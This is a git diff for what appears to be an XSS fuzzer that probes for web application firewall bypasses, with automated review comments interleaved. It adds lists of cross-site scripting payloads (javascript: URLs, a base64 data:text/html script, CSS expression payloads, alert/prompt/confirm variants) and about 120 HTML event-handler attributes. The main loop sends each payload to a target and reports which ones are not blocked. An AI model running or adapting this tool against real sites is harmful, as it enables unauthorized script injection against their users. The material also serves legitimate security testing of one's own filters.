diff --git a/.gitignore b/.gitignore
index 3d53637..d840996 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 venv
-chromedriver*
\ No newline at end of file
+chromedriver*
+__pycache__/
diff --git a/language.py b/language.py
new file mode 100644
index 0000000..227ba14
--- /dev/null
+++ b/language.py
@@ -0,0 +1,47 @@
+from language_utils import gen_boolean, gen_color, gen_date, gen_email, gen_javascript, gen_number, gen_style, gen_text, gen_url
+
+
+class HTMLTag:
+ def __init__(self, name, self_closing=False):
+ self.name = name
+ self.self_closing = self_closing
+ self.attributes = []
+ self.children = []
+
+
+class HTMLTagAttributeType:
+ TypeText = 0
+ TypeBoolean = 1
+ TypeNumber = 2
+ TypeColor = 3
+ TypeJavascript = 4
+ TypeStlye = 5
+ TypeURL = 6
+ TypeEmail = 7
+ TypeDate = 8
+
+
+Generators = {
+ HTMLTagAttributeType.TypeText: gen_text,
+ HTMLTagAttributeType.TypeBoolean: gen_boolean,
+ HTMLTagAttributeType.TypeNumber: gen_number,
+ HTMLTagAttributeType.TypeColor: gen_color,
+ HTMLTagAttributeType.TypeJavascript: gen_javascript,
+ HTMLTagAttributeType.TypeStlye: gen_style,
+ HTMLTagAttributeType.TypeURL: gen_url,
+ HTMLTagAttributeType.TypeEmail: gen_email,
+ HTMLTagAttributeType.TypeDate: gen_date,
+}
+
+
+class HTMLAttribute:
+ def __init__(self, name, value_type):
+ self.name = name
+ self.kind = value_type
+ self.value = Generators[value_type]()
+
+ def __str__(self) -> str:
+ if not self.value:
+ return self.name
+ else:
+ return f'{self.name}="{self.value}"'
diff --git a/language_utils.py b/language_utils.py
new file mode 100644
index 0000000..3a8b899
--- /dev/null
+++ b/language_utils.py
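Review bot: `HTMLAttribute.__str__` wraps the value in double quotes without escaping, yet several generator outputs already contain `"` (`window["alert"](0)`, `"confirm`0`"`, `url("javascript:alert(1)")`), so a rendered `onclick="window["alert"](0)"` closes the attribute at the second quote and the handler never runs — a "not filtered" verdict on such a probe says nothing about execution. Choose the quote per value, `q = "'" if '"' in self.value else '"'` then `return f'{self.name}={q}{self.value}{q}'`, or use `html.escape(self.value, quote=True)` if the intended landing context is a quoted attribute (entities are decoded before the handler is compiled). If the pre-quoted cases such as `"alert(1)"` are meant to bring their own quotes, that intent needs a comment and `__str__` should not add a second pair. Separately, `__init__` draws the payload once via `Generators[value_type]()`, so any module-level list of attributes fixes a single unseeded random payload per attribute for the life of the process; accepting an optional `value` argument (generator as the default) would let a caller cover every variant and reproduce a run with `random.seed`. `TypeStlye` is consistently misspelled within the hunk; fixing it now is cheaper than after callers exist.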
@@ -0,0 +1,122 @@
+from random import randint
+
+
+def gen_text():
+ cases = {
+ 0: lambda: 'alert(0)',
+ 1: lambda: 'prompt\x600\x60',
+ 2: lambda: '"confirm\x600\x60"',
+ 3: lambda: 'window["alert"](0)',
+ 4: lambda: 'window["prompt"](0)',
+ 5: lambda: 'window["confirm"](0)',
+ 6: lambda: '"alert\x600\x60"',
+ 7: lambda: '"prompt\x600\x60"',
+ 8: lambda: '"alert(1)"',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_boolean():
+ cases = {
+ 0: lambda: 'true',
+ 1: lambda: 'false',
+ 2: lambda: '1',
+ 3: lambda: '0',
+ 4: lambda: 'null',
+ 5: lambda: 'undefined',
+ 6: lambda: '""',
+ 7: lambda: '[]',
+ 8: lambda: '{}',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_number():
+ cases = {
+ 0: lambda: '0',
+ 1: lambda: '1',
+ 2: lambda: '0.1',
+ 3: lambda: '1.1',
+ 4: lambda: '0x1',
+ 5: lambda: '0b1',
+ 6: lambda: '0o1',
+ 7: lambda: '1e1',
+ 8: lambda: '1e-1',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_color():
+ cases = {
+ 0: lambda: '#000000',
+ 1: lambda: '#ffffff',
+ 2: lambda: '#ff0000',
+ 3: lambda: '#00ff00',
+ 4: lambda: '#0000ff',
+ 5: lambda: '#ffff00',
+ 6: lambda: '#00ffff',
+ 7: lambda: '#ff00ff',
+ 8: lambda: '#c0c0c0',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_javascript():
+ cases = {
+ 0: lambda: 'alert(0)',
+ 1: lambda: 'prompt\x600\x60',
+ 2: lambda: '"confirm\x600\x60"',
+ 3: lambda: 'window["alert"](0)',
+ 4: lambda: 'window["prompt"](0)',
+ 5: lambda: 'window["confirm"](0)',
+ 6: lambda: '"alert\x600\x60"',
+ 7: lambda: '"prompt\x600\x60"',
+ 8: lambda: '"alert(1)"',
+ 9: lambda: 'console.log(alert(1))//',
+ 10: lambda: 'console.log(alert(1))/*',
+ 11: lambda: '{1:alert(1)}',
+ }
+
+ return cases[randint(0, 11)]()
+
+
+def gen_style():
+ # xss via style
+ cases = {
+ 0: lambda: 'background-image:url("javascript:alert(1)")',
+ 1: lambda: 'expression(alert(1))',
+ 2: lambda: 'expression\x600\x60',
+ }
+
+ return cases[randint(0, 2)]()
+
+
+def gen_url():
+ # xss via url
+ cases = {
+ 0: lambda: 'javascript:alert(1)',
+ 1: lambda: 'data:text/html,',
+ 2: lambda: 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
+ 3: lambda: 'data:text/html,',
+ }
+
+ return cases[randint(0, 3)]()
+
+
+def gen_email():
+ # xss via email
+ cases = {
+ 0: lambda: '@javascript:alert(1)',
+ 1: lambda: 'javascript:alert(1)@',
+ 2: lambda: '@javascript:alert\x600\x60',
+ }
+
+ return cases[randint(0, 3)]()
+
+
+def gen_date():
+ return ''
diff --git a/tags.py b/tags.py
new file mode 100644
index 0000000..0551872
--- /dev/null
+++ b/tags.py
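Review bot: `gen_email` indexes `cases[randint(0, 3)]` but the dict only has keys 0–2, so one call in four raises `KeyError`, and because `HTMLAttribute.__init__` calls the generator at construction time the exception surfaces wherever an email-typed attribute is built; every generator hard-codes its upper bound the same way, which is how the bound and the table drifted apart. Replace the pattern with `return choice(list(cases.values()))()` (`from random import choice, randint`), or drop the lambdas entirely — no entry closes over anything — and return `choice([...])` from a plain list of strings. `gen_url` cases 1 and 3 read as identical `'data:text/html,'` in this view; if the page stripped `<script>…</script>` markup that is fine, otherwise one of them is a duplicate that wastes a draw. `random` is the right module here (payload selection is not a secret), but the unseeded draw makes runs non-reproducible, so either expose a seed or make the fuzzer log the chosen payload alongside each verdict.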
@@ -0,0 +1,248 @@
+from language import HTMLAttribute, HTMLTag, HTMLTagAttributeType
+
+
+Tags = [
+ HTMLTag('a', self_closing=False),
+ HTMLTag('abbr', self_closing=False),
+ HTMLTag('acronym', self_closing=False),
+ HTMLTag('address', self_closing=False),
+ HTMLTag('applet', self_closing=False),
+ HTMLTag('area', self_closing=True),
+ HTMLTag('article', self_closing=False),
+ HTMLTag('aside', self_closing=False),
+ HTMLTag('audio', self_closing=False),
+ HTMLTag('b', self_closing=False),
+ HTMLTag('base', self_closing=True),
+ HTMLTag('basefont', self_closing=False),
+ HTMLTag('bdi', self_closing=False),
+ HTMLTag('bdo', self_closing=False),
+ HTMLTag('big', self_closing=False),
+ HTMLTag('blockquote', self_closing=False),
+ HTMLTag('body', self_closing=False),
+ HTMLTag('br', self_closing=True),
+ HTMLTag('button', self_closing=False),
+ HTMLTag('canvas', self_closing=False),
+ HTMLTag('caption', self_closing=False),
+ HTMLTag('center', self_closing=False),
+ HTMLTag('cite', self_closing=False),
+ HTMLTag('code', self_closing=False),
+ HTMLTag('col', self_closing=True),
+ HTMLTag('colgroup', self_closing=False),
+ HTMLTag('data', self_closing=False),
+ HTMLTag('datalist', self_closing=False),
+ HTMLTag('dd', self_closing=False),
+ HTMLTag('del', self_closing=False),
+ HTMLTag('details', self_closing=False),
+ HTMLTag('dfn', self_closing=False),
+ HTMLTag('dialog', self_closing=False),
+ HTMLTag('dir', self_closing=False),
+ HTMLTag('div', self_closing=False),
+ HTMLTag('dl', self_closing=False),
+ HTMLTag('dt', self_closing=False),
+ HTMLTag('em', self_closing=False),
+ HTMLTag('embed', self_closing=True),
+ HTMLTag('fieldset', self_closing=False),
+ HTMLTag('figcaption', self_closing=False),
+ HTMLTag('figure', self_closing=False),
+ HTMLTag('font', self_closing=False),
+ HTMLTag('footer', self_closing=False),
+ HTMLTag('form', self_closing=False),
+ HTMLTag('frame', self_closing=True),
+ HTMLTag('frameset', self_closing=False),
+ HTMLTag('h1', self_closing=False),
+ HTMLTag('h2', self_closing=False),
+ HTMLTag('h3', self_closing=False),
+ HTMLTag('h4', self_closing=False),
+ HTMLTag('h5', self_closing=False),
+ HTMLTag('h6', self_closing=False),
+ HTMLTag('head', self_closing=False),
+ HTMLTag('header', self_closing=False),
+ HTMLTag('hr', self_closing=True),
+ HTMLTag('html', self_closing=False),
+ HTMLTag('i', self_closing=False),
+ HTMLTag('iframe', self_closing=False),
+ HTMLTag('img', self_closing=True),
+ HTMLTag('input', self_closing=True),
+ HTMLTag('ins', self_closing=False),
+ HTMLTag('kbd', self_closing=False),
+ HTMLTag('label', self_closing=False),
+ HTMLTag('legend', self_closing=False),
+ HTMLTag('li', self_closing=False),
+ HTMLTag('link', self_closing=True),
+ HTMLTag('main', self_closing=False),
+ HTMLTag('map', self_closing=False),
+ HTMLTag('mark', self_closing=False),
+ HTMLTag('meta', self_closing=True),
+ HTMLTag('meter', self_closing=False),
+ HTMLTag('nav', self_closing=False),
+ HTMLTag('noframes', self_closing=False),
+ HTMLTag('noscript', self_closing=False),
+ HTMLTag('object', self_closing=False),
+ HTMLTag('ol', self_closing=False),
+ HTMLTag('optgroup', self_closing=False),
+ HTMLTag('option', self_closing=False),
+ HTMLTag('output', self_closing=False),
+ HTMLTag('p', self_closing=False),
+ HTMLTag('param', self_closing=True),
+ HTMLTag('picture', self_closing=False),
+ HTMLTag('pre', self_closing=False),
+ HTMLTag('progress', self_closing=False),
+ HTMLTag('q', self_closing=False),
+ HTMLTag('rp', self_closing=False),
+ HTMLTag('rt', self_closing=False),
+ HTMLTag('ruby', self_closing=False),
+ HTMLTag('s', self_closing=False),
+ HTMLTag('samp', self_closing=False),
+ HTMLTag('script', self_closing=False),
+ HTMLTag('section', self_closing=False),
+ HTMLTag('select', self_closing=False),
+ HTMLTag('small', self_closing=False),
+ HTMLTag('source', self_closing=True),
+ HTMLTag('span', self_closing=False),
+ HTMLTag('strike', self_closing=False),
+ HTMLTag('strong', self_closing=False),
+ HTMLTag('style', self_closing=False),
+ HTMLTag('sub', self_closing=False),
+ HTMLTag('summary', self_closing=False),
+ HTMLTag('sup', self_closing=False),
+ HTMLTag('svg', self_closing=False),
+ HTMLTag('table', self_closing=False),
+ HTMLTag('tbody', self_closing=False),
+ HTMLTag('td', self_closing=False),
+ HTMLTag('template', self_closing=False),
+ HTMLTag('textarea', self_closing=False),
+ HTMLTag('tfoot', self_closing=False),
+ HTMLTag('th', self_closing=False),
+ HTMLTag('thead', self_closing=False),
+ HTMLTag('time', self_closing=False),
+ HTMLTag('title', self_closing=False),
+ HTMLTag('tr', self_closing=False),
+ HTMLTag('track', self_closing=True),
+ HTMLTag('tt', self_closing=False),
+ HTMLTag('u', self_closing=False),
+ HTMLTag('ul', self_closing=False),
+ HTMLTag('var', self_closing=False),
+ HTMLTag('video', self_closing=False),
+ HTMLTag('wbr', self_closing=True),
+ HTMLTag('xmp', self_closing=False),
+]
+
+Attributes = [
+ # events
+ HTMLAttribute('onafterprint', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onafterscriptexecute', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationcancel', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationiteration', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onauxclick', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforecopy', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforecut', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforeinput', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforeprint', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforescriptexecute',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforetoggle', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforeunload', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbegin', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onblur', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbounce', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncanplay', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncanplaythrough', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onclick', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onclose', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncontextmenu', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncopy', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncuechange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncut', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondblclick', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondrag', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragenter', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragleave', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragover', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondrop', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondurationchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onended', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onerror', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfinish', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfocus', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfocusin', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfocusout', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfullscreenchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onhashchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oninput', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oninvalid', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onkeydown', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onkeypress', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onkeyup', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onload', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onloadeddata', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onloadedmetadata', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmessage', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmousedown', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseenter', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseleave', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmousemove', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseout', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseover', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseup', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmousewheel', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmozfullscreenchange',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpagehide', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpageshow', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpaste', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpause', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onplay', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onplaying', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerdown', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerenter', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerleave', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointermove', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerout', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerover', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerrawupdate', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerup', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpopstate', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onprogress', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onratechange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onrepeat', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onreset', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onresize', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onscroll', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onscrollend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onsearch', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onseeked', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onseeking', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onselect', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onselectionchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onselectstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onshow', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onsubmit', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontimeupdate', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontoggle', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontoggle(popover)', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontouchend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontouchmove', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontouchstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitioncancel', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitionend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitionrun', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitionstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onunhandledrejection', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onunload', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onvolumechange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkitanimationend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkitanimationiteration',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkitanimationstart',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkittransitionend',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwheel', HTMLTagAttributeType.TypeJavascript),
+]
diff --git a/xzzuf.py b/xzzuf.py
index d7d49a6..7b3773a 100644
--- a/xzzuf.py
+++ b/xzzuf.py
@@ -6,7 +6,11 @@
 from selenium.webdriver.support.ui import WebDriverWait
 from urllib.parse import urlparse
 from urllib.parse import urlencode
+from tags import Attributes
+
 # WAFBypass class
+
+
 class WAFBypass():
 code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"
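Review bot: `HTMLAttribute('ontoggle(popover)', …)` is not an attribute name — `__str__` renders it as `ontoggle(popover)="…"`, `urlencode` then sends `ontoggle%28popover%29=`, and no browser binds a handler to it, so the probe only measures whether the WAF objects to parentheses; `ontoggle` is already in the list on the line above, so drop this entry (if popover coverage is the goal, keep `ontoggle` and vary the element it is placed on). Every entry in `Attributes` draws its payload from the unseeded generator at import time, so a single run tests exactly one JavaScript variant per attribute and two runs are not comparable; exposing a function that builds fresh `HTMLAttribute`s, or iterating the generator cases inside the fuzzer, would fix both. `Tags` is defined but nothing in this change imports it (xzzuf.py pulls only `Attributes`), so `HTMLTag.attributes` and `.children` are currently unused — acceptable as scaffolding, but a `# TODO: tag/attribute combinations not yet fuzzed` would make that visible.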
@@ -52,35 +56,27 @@ class WAFBypass():
 self.driver.get(url)
 self.wait_for_pageload()
- bypass = False
+ is403 = False
 if self.is_403:
- bypass = False
+ is403 = True
 else:
- bypass = True
+ is403 = False
- bypass = bypass and self.triggered_xss
+ triggerxss = self.triggered_xss
- return bypass
+ return (is403, triggerxss)
 def run_fuzz(self):
- payloads = [
- "",
- "",
- "\u202e",
- """<<\nscrip t="alert(0)""",
- ]
 try:
- for i in range(0, 0x10FFFF):
- for p in payloads:
- encoded = urlencode(
- {"param2": p.replace("{FUZZ}", chr(i))})
- print("Trying payload: ", encoded, f"({hex(i)}/0xffff)")
- url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
- bypassed = self.navigate(url)
- if bypassed:
- print("Bypassed with payload: ", encoded)
- break
+ for attr in Attributes:
+ # print(f"[*] Testing {attr.name} attribute {attr}")
+ encoded = urlencode({"param2": f"{attr}"})
+ url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
+ # print(url)
+ is403, trigger = self.navigate(url)
+ if not is403:
+ print(f"[+] {attr.name} attribute is not filtered")
 except KeyboardInterrupt:
 self.driver.close()
 exit(0)
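Review bot: `run_fuzz` now throws away the second value of `navigate` — `is403, trigger = self.navigate(url)` is followed only by `if not is403`, so "[+] … attribute is not filtered" is printed for any non-403 response whether or not the alert hook fired, whereas the removed code required both; a WAF that answers 200 with the payload stripped or encoded is reported as bypassed. Report the two signals separately so the output distinguishes "not blocked" from "executed", and include the rendered `attr` so the reader knows which of the random payloads was actually sent (the payload is fixed per attribute at import, so it is not recoverable from the name alone). On the `navigate` side the `is403 = False / if … True / else … False` ladder collapses to `is403 = bool(self.is_403)` — assuming `is_403` is an attribute or property, which this hunk cannot confirm; `f"{attr}"` is just `str(attr)`. Both methods extend beyond the hunk: `navigate`'s signature and the class body around these two methods are outside it.
```python
                url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
                is403, triggered = self.navigate(url)
                if not is403:
                    print(f"[+] {attr.name}: not blocked (no 403) with {attr}")
                if triggered:
                    print(f"[!] {attr.name}: payload executed: {attr}")
                # … unchanged: KeyboardInterrupt handling …
```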